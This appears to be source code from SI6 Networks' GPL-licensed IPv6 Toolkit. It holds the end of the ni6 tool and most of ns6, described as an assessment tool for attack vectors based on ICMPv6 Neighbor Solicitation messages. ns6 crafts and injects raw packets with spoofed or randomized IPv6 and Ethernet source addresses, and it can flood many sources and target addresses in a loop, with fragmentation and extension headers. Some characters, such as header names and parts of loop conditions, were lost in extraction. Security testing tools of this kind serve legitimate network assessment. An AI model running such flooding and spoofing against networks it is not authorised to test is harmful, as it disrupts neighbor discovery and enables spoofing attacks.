for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "ni6: Assessment tool for attack vectors based on ICMPv6 NI messages\n"); if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!(idata->hsrcaddr_f))?" (randomized)":"")); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (automatically selected)":"")); } if(idata->srcaddr_f){ if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Source Address: %s%s\n", psrcaddr, ((srcprefix_f)?" (randomized)":"")); } else{ if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Source Address: %s (automatically selected)\n", psrcaddr); } else puts("IPv6 Source Address: Automatically selected"); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); if(type==ICMP6_NI_QUERY){ printf("ICMPv6 NI Query (Type 139)"); switch(code){ case 0: printf(", Subject is an IPv6 address (Code %u)\n", code); if(ipv6addr_f){ if(inet_ntop(AF_INET6, &ipv6addr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Subject IPv6 Address to presentation format"); exit(EXIT_FAILURE); } printf("Subject IPv6 Address: %s\n", pv6addr); } break; case 1: printf(", Subject is a Name (Code %u)\n", code); if(name_f){ printf("Subject Name: %s%s\n", printname, (snameslabel_f)?" (single label name)":""); } else if(fname_f){ printf("Subject Name: Forged Name of %u byte%s\n", fnamelen, (fnamelen>1)?"s":""); } else if(exceedp_f){ printf("Subject Name: Malformed label of %u byte%s\n", exceedp, (exceedp>1)?"s":""); } break; case 2: printf(", Subject is an IPv4 Address (Code %u)\n", code); if(ipv4addr_f){ if(inet_ntop(AF_INET, &ipv4addr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Subject IPv4 Address to presentation format"); exit(EXIT_FAILURE); } printf("Subject IPv4 Address: %s\n", pv6addr); } break; default: printf(", Unknown ICMPv6 code (Code %u)\n", code); break; } switch(qtype){ case NI_QTYPE_NOOP: printf("Qtype: NOOP (Qtype %u)\n", qtype); break; case NI_QTYPE_SUPTYPES: printf("Qtype: Subtypes (?) (Qtype %u)\n", qtype); break; case NI_QTYPE_DNSNAME: printf("Qtype: Node Name (Qtype %u)\n", qtype); break; case NI_QTYPE_NODEADDR: printf("Qtype: Node Addresses (Qtype %u)\n", qtype); break; case NI_QTYPE_IPV4ADDR: printf("Qtype: IPv4 Addresses (Qtype %u)\n", qtype); break; default: printf("Qtype: (Qtype %u)\n", qtype); break; } } else if(type == ICMP6_NI_REPLY){ printf("ICMPv6 NI Reply (Type 140)"); switch(qtype){ case 0: puts(", NOOP (Qtype 0)"); case 1: puts(", Supported Qtypes (Qtype 1)"); case 2: printf(", Data is a Name (Qtype %u)\n", qtype); if(named_f){ printf("Data Name: %s%s\n", printnamed, (snamedslabel_f)?" (single label name)":""); } else if(fnamed_f){ printf("Data Name: Forged Name of %u byte%s\n", fnamedlen, (fnamedlen>1)?"s":""); } else if(exceedpd_f){ printf("Data Name: Malformed label of %u byte%s\n", exceedp, (exceedp>1)?"s":""); } break; case 3: printf(", Data contains IPv6 address(es) (Qtype %u)\n", qtype); if(ipv6addrd_f){ if(inet_ntop(AF_INET6, &ipv6addrd, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Subject IPv6 Address to presentation format"); exit(EXIT_FAILURE); } printf("Data IPv6 Address: %s\n", pv6addr); } break; case 4: printf(", Data contains IPv4 Address(es) (Qtype %u)\n", qtype); if(ipv4addrd_f){ if(inet_ntop(AF_INET, &ipv4addrd, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Data IPv4 Address to presentation format"); exit(EXIT_FAILURE); } printf("Data IPv4 Address: %s\n", pv6addr); } break; default: printf(", Unknown ICMPv6 NI Query type (Qtype %u)\n", qtype); break; } } if(flags_f || type== ICMP6_NI_QUERY){ printf("Flags: %s%s%s%s%s%s%s%s\n\n", ((flags & NI_NODEADDR_FLAG_GLOBAL)?"G":""), \ ((flags & NI_NODEADDR_FLAG_SITELOCAL)?"S":""), \ ((flags & NI_NODEADDR_FLAG_LINKLOCAL)?"L":""), \ ((flags & NI_NODEADDR_FLAG_COMPAT)?"C":""),\ ((flags & NI_NODEADDR_FLAG_ALL)?"A":""), \ ((flags & NI_NODEADDR_FLAG_TRUNCATE)?"T":""),\ ((!flags)?"none":""), ((!flags_f)?" (default)":"")); } } ipv6toolkit-2.0+ds.1/tools/ni6.h000066400000000000000000000001121254360455000164110ustar00rootroot00000000000000/* * Header file for the ni6 tool * */ #define QUERY_TIMEOUT 2 ipv6toolkit-2.0+ds.1/tools/ns6.c000066400000000000000000000722401254360455000164310ustar00rootroot00000000000000/* * ns6: A security assessment tool for attack vectors based on * ICMPv6 Neighbor Solicitation messages * * Copyright (C) 2009-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make ns6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ns6.h" #include "libipv6.h" #include "ipv6toolkit.h" void init_packet_data(struct iface_data *); void send_packet(struct iface_data *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556]; unsigned char *v6buffer, *ptr, *startofprefixes; struct ip6_hdr *ipv6; struct nd_neighbor_solicit *ns; struct ether_header *ethernet, *pkt_ether; struct nd_opt_slla *sllaopt; struct in6_addr targetaddr; char *lasts, *endptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand, sources, nsources, targets, ntargets; uint16_t mask; uint8_t hoplimit; struct ether_addr linkaddr[MAX_SLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; unsigned int nsleep; char *charptr; char plinkaddr[ETHER_ADDR_PLEN], phsrcaddr[ETHER_ADDR_PLEN], phdstaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char sllopt_f=0, sllopta_f=0, targetprefix_f=0, targetaddr_f=0; unsigned char loop_f = 0, sleep_f=0, floods_f=0, floodt_f=0, newdata_f=0, hoplimit_f=0; unsigned char targetpreflen; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; int r; struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-address", required_argument, 0, 'S'}, {"link-dst-address", required_argument, 0, 'D'}, {"target-address", required_argument, 0, 't'}, {"source-lla-opt", required_argument, 0, 'E'}, {"add-slla-opt", no_argument, 0, 'e'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-targets", required_argument, 0, 'T'}, {"loop", no_argument, 0, 'l'}, {"sleep", no_argument, 0, 'z'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:t:eE:F:T:lz:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option =r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=1; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 't': /* NA Target address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Target Address not valid"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Target Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ targetpreflen = atoi(charptr); if(targetpreflen>128){ puts("Prefix length error in Target Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, targetpreflen); targetprefix_f=1; } break; case 'E': /* Source link-layer option */ sllopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } sllopta_f=1; nlinkaddr++; break; case 'e': /* Add Source link-layer option */ sllopt_f = 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'T': /* Flood targets */ ntargets= atoi(optarg); if(ntargets == 0){ puts("Invalid number of Target Addresses in option -T"); exit(EXIT_FAILURE); } floodt_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f=1; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("ns6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(!targetaddr_f){ puts("Must specify a ND target address with the '-t' option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(pcap_compile(idata.pfd, &pcap_filter, PCAP_NOPACKETS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); srandom(time(NULL)); /* If the IPv6 Source Address has not been specified, and the "-F" (flood) option has not been specified, select a random link-local unicast address. */ if(!idata.srcaddr_f && !floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second highe-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &(idata.srcaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(idata.srcaddr), &(idata.srcaddr), 64); idata.srcpreflen=64; } /* If the flood target option ("-T") was specified, but no prefix was specified, select the random Target Addresses from the link-local unicast prefix (fe80::/64). */ if(floodt_f && !targetprefix_f){ if ( inet_pton(AF_INET6, "fe80::", &(targetaddr)) <= 0){ puts("inet_pton(): Error when converting address"); exit(EXIT_FAILURE); } randomize_ipv6_addr(&(targetaddr), &(targetaddr), 64); targetpreflen=64; } if(!floodt_f) ntargets=1; if(!idata.dstaddr_f){ /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } } if(!idata.hsrcaddr_f && !floods_f) /* Source link-layer address is randomized by default */ randomize_ether_addr(&(idata.hsrcaddr)); if(sllopt_f && !sllopta_f){ /* The value of the source link-layer address option */ linkaddr[0]= idata.hsrcaddr; /* defaults to the source Ethernet address */ nlinkaddr++; } if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(!floods_f) nsources=1; if(!sleep_f) nsleep=1; if( !idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire a Neighbor Solicitarion message */ send_packet(&idata); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f && idata.verbose_f) printf("Now sending Neighbor Solicitations every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (U. part) (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_neighbor_solicit)) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting Neighbor Solicitation header (should be using Frag. option?)"); exit(EXIT_FAILURE); } ns= (struct nd_neighbor_solicit *) (ptr); ns->nd_ns_type = ND_NEIGHBOR_SOLICIT; ns->nd_ns_code = 0; ns->nd_ns_reserved = 0; ns->nd_ns_target = targetaddr; ptr += sizeof(struct nd_neighbor_solicit); sllaopt = (struct nd_opt_slla *) ptr; /* If a single source link-layer address is specified, it is included in all packets */ if(sllopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_slla)) <= (v6buffer+idata->max_packet_size)){ sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, linkaddr[0].a, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); } else{ puts("Packet too large while processing source link-layer addresss opt. (should be using Frag. option?)"); exit(EXIT_FAILURE); } } startofprefixes = ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Solicitation message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata){ sources=0; do{ if(floods_f){ /* Randomize the IPv6 Source address based on the specified prefix and prefix length (defaults to fe80::/64). */ randomize_ipv6_addr(&(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); if(!idata->hsrcaddr_f){ randomize_ether_addr(&(ethernet->src)); /* If the source-link layer address must be included, but no value was specified we set it to the randomized Ethernet Source Address */ if(sllopt_f && !sllopta_f){ memcpy(sllaopt->address, ethernet->src.a, ETH_ALEN); } } } targets=0; do{ if(floodt_f){ /* Randomizing the ND Target Address based on the prefix specified by "targetaddr" and targetpreflen. */ randomize_ipv6_addr(&(ns->nd_ns_target), &(targetaddr), targetpreflen); } if(nlinkaddr==1) /* If a single source link-layer address must be included, it is included */ linkaddrs=1; /* by init_packet_data() (rather than by send_packet() */ else linkaddrs=0; do{ newdata_f=0; ptr = startofprefixes; while(linkaddrsmax_packet_size){ sllaopt = (struct nd_opt_slla *) ptr; sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, linkaddr[linkaddrs].a, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); linkaddrs++; newdata_f=1; } ns->nd_ns_cksum = 0; ns->nd_ns_cksum = in_chksum(v6buffer, ns, ptr-((unsigned char *)ns), IPPROTO_ICMPV6); if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } } }while(linkaddrs\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Print attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodt_f) printf("Flooding the target with %u ND Target Addresses\n", ntargets); if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } if(ether_ntop(&(idata->hdstaddr), phdstaddr, sizeof(phdstaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", phdstaddr, \ 